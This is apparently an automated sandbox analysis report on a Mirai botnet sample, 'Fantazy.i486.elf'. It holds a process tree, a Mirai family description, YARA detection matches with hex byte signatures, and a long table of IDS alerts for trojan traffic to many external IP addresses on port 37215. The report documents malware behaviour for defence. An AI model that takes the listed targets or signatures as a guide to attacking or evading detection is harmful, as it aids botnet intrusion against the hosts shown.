      • grep (PID: 6763, Parent: 6762, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6767, Parent: 6761, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6768, Parent: 6767)
      • grep (PID: 6768, Parent: 6767, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6770, Parent: 6761, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6774, Parent: 6770)
      • grep (PID: 6774, Parent: 6770, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6780, Parent: 6761, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6781, Parent: 6780)
      • grep (PID: 6781, Parent: 6780, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6782, Parent: 6761, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6783, Parent: 6782)
      • grep (PID: 6783, Parent: 6782, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6784, Parent: 6761, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6785, Parent: 6784)
      • grep (PID: 6785, Parent: 6784, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6786, Parent: 6761, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6787, Parent: 6786)
      • grep (PID: 6787, Parent: 6786, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6788, Parent: 6761, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6789, Parent: 6788)
      • grep (PID: 6789, Parent: 6788, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 6765, Parent: 1)
  • rtkit-daemon (PID: 6765, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 6773, Parent: 1)
  • polkitd (PID: 6773, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 6790, Parent: 1)
  • rsyslogd (PID: 6790, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6794, Parent: 1)
  • agetty (PID: 6794, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 6795, Parent: 1)
  • systemd-journald (PID: 6795, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6798, Parent: 1)
  • generate-config (PID: 6798, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 6799, Parent: 6798, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 6806, Parent: 1)
  • systemd-logind (PID: 6806, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6834, Parent: 1)
  • dbus-daemon (PID: 6834, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6866, Parent: 1860)
  • pulseaudio (PID: 6866, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 6868, Parent: 1)
  • rtkit-daemon (PID: 6868, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 6870, Parent: 1)
  • gdm-wait-for-drm (PID: 6870, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 6873, Parent: 1)
  • polkitd (PID: 6873, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 6881, Parent: 1860)
  • dbus-daemon (PID: 6881, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6884, Parent: 1)
  • rsyslogd (PID: 6884, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6888, Parent: 1)
  • agetty (PID: 6888, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 6889, Parent: 1)
  • systemd-journald (PID: 6889, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6891, Parent: 1)
  • gdm3 (PID: 6891, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 6955, Parent: 6891)
    • plymouth (PID: 6955, Parent: 6891, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
  • systemd New Fork (PID: 6895, Parent: 1)
  • systemd-logind (PID: 6895, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6959, Parent: 1)
  • dbus-daemon (PID: 6959, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6960, Parent: 1860)
  • pulseaudio (PID: 6960, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 6961, Parent: 1)
  • gpu-manager (PID: 6961, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 6963, Parent: 6961, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6964, Parent: 6963)
      • grep (PID: 6964, Parent: 6963, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6968, Parent: 6961, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6969, Parent: 6968)
      • grep (PID: 6969, Parent: 6968, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6973, Parent: 6961, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6974, Parent: 6973)
      • grep (PID: 6974, Parent: 6973, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6975, Parent: 6961, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6976, Parent: 6975)
      • grep (PID: 6976, Parent: 6975, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6977, Parent: 6961, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6978, Parent: 6977)
      • grep (PID: 6978, Parent: 6977, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6979, Parent: 6961, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6980, Parent: 6979)
      • grep (PID: 6980, Parent: 6979, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6983, Parent: 6961, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6984, Parent: 6983)
      • grep (PID: 6984, Parent: 6983, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6985, Parent: 6961, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6986, Parent: 6985)
      • grep (PID: 6986, Parent: 6985, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 6962, Parent: 1)
  • rtkit-daemon (PID: 6962, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 6967, Parent: 1)
  • polkitd (PID: 6967, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 6988, Parent: 1)
  • generate-config (PID: 6988, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 6989, Parent: 6988, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 6991, Parent: 1860)
  • dbus-daemon (PID: 6991, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6992, Parent: 1)
  • gdm-wait-for-drm (PID: 6992, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 6995, Parent: 1)
  • rsyslogd (PID: 6995, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6999, Parent: 1)
  • agetty (PID: 6999, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 7000, Parent: 1)
  • systemd-journald (PID: 7000, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 7008, Parent: 1)
  • systemd-logind (PID: 7008, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 7066, Parent: 1)
  • dbus-daemon (PID: 7066, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 7067, Parent: 1860)
  • pulseaudio (PID: 7067, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 7068, Parent: 1)
  • rtkit-daemon (PID: 7068, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 7071, Parent: 1)
  • polkitd (PID: 7071, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 7072, Parent: 1)
  • gdm3 (PID: 7072, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 7080, Parent: 7072)
    • plymouth (PID: 7080, Parent: 7072, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
  • systemd New Fork (PID: 7081, Parent: 1)
  • accounts-daemon (PID: 7081, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 7085, Parent: 7081, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 7086, Parent: 7085, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 7087, Parent: 7086, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 7088, Parent: 7087)
          • locale (PID: 7088, Parent: 7087, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 7089, Parent: 7087)
          • grep (PID: 7089, Parent: 7087, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 7094, Parent: 1860)
  • dbus-daemon (PID: 7094, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
Fantazy.i486.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    Fantazy.i486.elfLinux_Trojan_Mirai_aa39fb02unknownunknown
    • 0xa8e0:$a: 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80
    Fantazy.i486.elfLinux_Trojan_Mirai_3a56423bunknownunknown
    • 0x1060b:$a: 24 1C 8B 44 24 20 0F B6 D0 C1 E8 08 89 54 24 24 89 44 24 20 BA 01 00
    Fantazy.i486.elfLinux_Trojan_Mirai_575f5bc8unknownunknown
    • 0x12b60:$a: 5A 56 5B 5B 55 42 44 5E 59 52 44 44 00 5E 73 5E 45 52 54 43 00
    Fantazy.i486.elfLinux_Trojan_Mirai_6e8e9257unknownunknown
    • 0x2602:$a: 53 83 EC 04 8B 5C 24 18 8B 7C 24 20 8A 44 24 14 8A 54 24 1C 88 54
    • 0x2672:$a: 53 83 EC 04 8B 5C 24 18 8B 7C 24 20 8A 44 24 14 8A 54 24 1C 88 54
    Click to see the 1 entries
    SourceRuleDescriptionAuthorStrings
    6219.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      6219.1.0000000008048000.000000000805c000.r-x.sdmpLinux_Trojan_Mirai_aa39fb02unknownunknown
      • 0xa8e0:$a: 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80
      6219.1.0000000008048000.000000000805c000.r-x.sdmpLinux_Trojan_Mirai_3a56423bunknownunknown
      • 0x1060b:$a: 24 1C 8B 44 24 20 0F B6 D0 C1 E8 08 89 54 24 24 89 44 24 20 BA 01 00
      6219.1.0000000008048000.000000000805c000.r-x.sdmpLinux_Trojan_Mirai_575f5bc8unknownunknown
      • 0x12b60:$a: 5A 56 5B 5B 55 42 44 5E 59 52 44 44 00 5E 73 5E 45 52 54 43 00
      6219.1.0000000008048000.000000000805c000.r-x.sdmpLinux_Trojan_Mirai_6e8e9257unknownunknown
      • 0x2602:$a: 53 83 EC 04 8B 5C 24 18 8B 7C 24 20 8A 44 24 14 8A 54 24 1C 88 54
      • 0x2672:$a: 53 83 EC 04 8B 5C 24 18 8B 7C 24 20 8A 44 24 14 8A 54 24 1C 88 54
      Click to see the 16 entries
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-02-12T16:57:00.503363+010028352221A Network Trojan was detected192.168.2.2357264193.111.52.7137215TCP
      2025-02-12T16:57:00.539720+010028352221A Network Trojan was detected192.168.2.233521641.251.145.4537215TCP
      2025-02-12T16:57:04.994716+010028352221A Network Trojan was detected192.168.2.233732041.136.24.19137215TCP
      2025-02-12T16:57:06.710976+010028352221A Network Trojan was detected192.168.2.2338808197.6.20.11737215TCP
      2025-02-12T16:57:07.258039+010028352221A Network Trojan was detected192.168.2.233433641.246.130.24337215TCP
      2025-02-12T16:57:07.438184+010028352221A Network Trojan was detected192.168.2.2353128156.224.230.537215TCP
      2025-02-12T16:57:12.574736+010028352221A Network Trojan was detected192.168.2.2333390137.82.121.7837215TCP
      2025-02-12T16:57:12.856647+010028352221A Network Trojan was detected192.168.2.2356332196.73.182.4337215TCP
      2025-02-12T16:57:20.124727+010028352221A Network Trojan was detected192.168.2.233774641.60.239.5037215TCP
      2025-02-12T16:57:20.125573+010028352221A Network Trojan was detected192.168.2.2347756157.190.149.19937215TCP
      2025-02-12T16:57:20.125739+010028352221A Network Trojan was detected192.168.2.2336036197.141.157.8037215TCP
      2025-02-12T16:57:20.126148+010028352221A Network Trojan was detected192.168.2.2333450197.51.43.8037215TCP
      2025-02-12T16:57:20.140208+010028352221A Network Trojan was detected192.168.2.2356976157.28.40.19837215TCP
      2025-02-12T16:57:20.140423+010028352221A Network Trojan was detected192.168.2.2335680197.129.42.13737215TCP
      2025-02-12T16:57:20.140522+010028352221A Network Trojan was detected192.168.2.2353300157.34.117.2537215TCP
      2025-02-12T16:57:20.140738+010028352221A Network Trojan was detected192.168.2.2346186197.118.5.10837215TCP
      2025-02-12T16:57:20.140767+010028352221A Network Trojan was detected192.168.2.2359702157.30.250.7637215TCP
      2025-02-12T16:57:20.141063+010028352221A Network Trojan was detected192.168.2.2355834118.249.101.16937215TCP
      2025-02-12T16:57:20.141168+010028352221A Network Trojan was detected192.168.2.2359726197.83.110.3437215TCP
      2025-02-12T16:57:20.141267+010028352221A Network Trojan was detected192.168.2.2352486181.83.194.18437215TCP
      2025-02-12T16:57:20.141749+010028352221A Network Trojan was detected192.168.2.2335302157.45.7.17437215TCP
      2025-02-12T16:57:20.141794+010028352221A Network Trojan was detected192.168.2.2337556197.224.91.11237215TCP
      2025-02-12T16:57:20.142011+010028352221A Network Trojan was detected192.168.2.2358798197.79.89.15237215TCP
      2025-02-12T16:57:20.142175+010028352221A Network Trojan was detected192.168.2.2342800197.131.64.24737215TCP
      2025-02-12T16:57:20.142274+010028352221A Network Trojan was detected192.168.2.2343570157.36.136.8137215TCP
      2025-02-12T16:57:20.142371+010028352221A Network Trojan was detected192.168.2.235638441.76.250.14037215TCP
      2025-02-12T16:57:20.142386+010028352221A Network Trojan was detected192.168.2.2336210197.1.4.19937215TCP
      2025-02-12T16:57:20.142715+010028352221A Network Trojan was detected192.168.2.235862841.240.196.19237215TCP
      2025-02-12T16:57:20.142771+010028352221A Network Trojan was detected192.168.2.2350546157.82.183.1237215TCP
      2025-02-12T16:57:20.142964+010028352221A Network Trojan was detected192.168.2.234936632.10.203.11537215TCP
      2025-02-12T16:57:20.143108+010028352221A Network Trojan was detected192.168.2.2334146173.40.40.17737215TCP
      2025-02-12T16:57:20.143154+010028352221A Network Trojan was detected192.168.2.235335841.136.218.10137215TCP
      2025-02-12T16:57:20.143154+010028352221A Network Trojan was detected192.168.2.2358028197.61.142.22637215TCP
      2025-02-12T16:57:20.143168+010028352221A Network Trojan was detected192.168.2.234867657.27.69.24937215TCP
      2025-02-12T16:57:20.143324+010028352221A Network Trojan was detected192.168.2.234945059.10.198.20237215TCP
      2025-02-12T16:57:20.143597+010028352221A Network Trojan was detected192.168.2.234126041.65.107.12837215TCP
      2025-02-12T16:57:20.144047+010028352221A Network Trojan was detected192.168.2.2350376157.147.20.19937215TCP
      2025-02-12T16:57:20.144138+010028352221A Network Trojan was detected192.168.2.2353074197.139.7.6137215TCP
      2025-02-12T16:57:20.144518+010028352221A Network Trojan was detected192.168.2.234123641.15.241.24237215TCP
      2025-02-12T16:57:20.144640+010028352221A Network Trojan was detected192.168.2.2347832157.120.192.23937215TCP
      2025-02-12T16:57:20.144640+010028352221A Network Trojan was detected192.168.2.2337188141.38.129.4637215TCP
      2025-02-12T16:57:20.144721+010028352221A Network Trojan was detected192.168.2.2349424211.101.167.3937215TCP
      2025-02-12T16:57:20.144809+010028352221A Network Trojan was detected192.168.2.23519968.81.85.22737215TCP
      2025-02-12T16:57:20.144904+010028352221A Network Trojan was detected192.168.2.2354834197.198.227.6937215TCP
      2025-02-12T16:57:20.144992+010028352221A Network Trojan was detected192.168.2.2358554197.248.130.16437215TCP
      2025-02-12T16:57:20.145353+010028352221A Network Trojan was detected192.168.2.2345094197.36.230.8837215TCP
      2025-02-12T16:57:20.145402+010028352221A Network Trojan was detected192.168.2.2352068197.2.17.21237215TCP
      2025-02-12T16:57:20.145642+010028352221A Network Trojan was detected192.168.2.2357514136.126.146.11637215TCP
      2025-02-12T16:57:20.145697+010028352221A Network Trojan was detected192.168.2.2340614197.123.16.8037215TCP
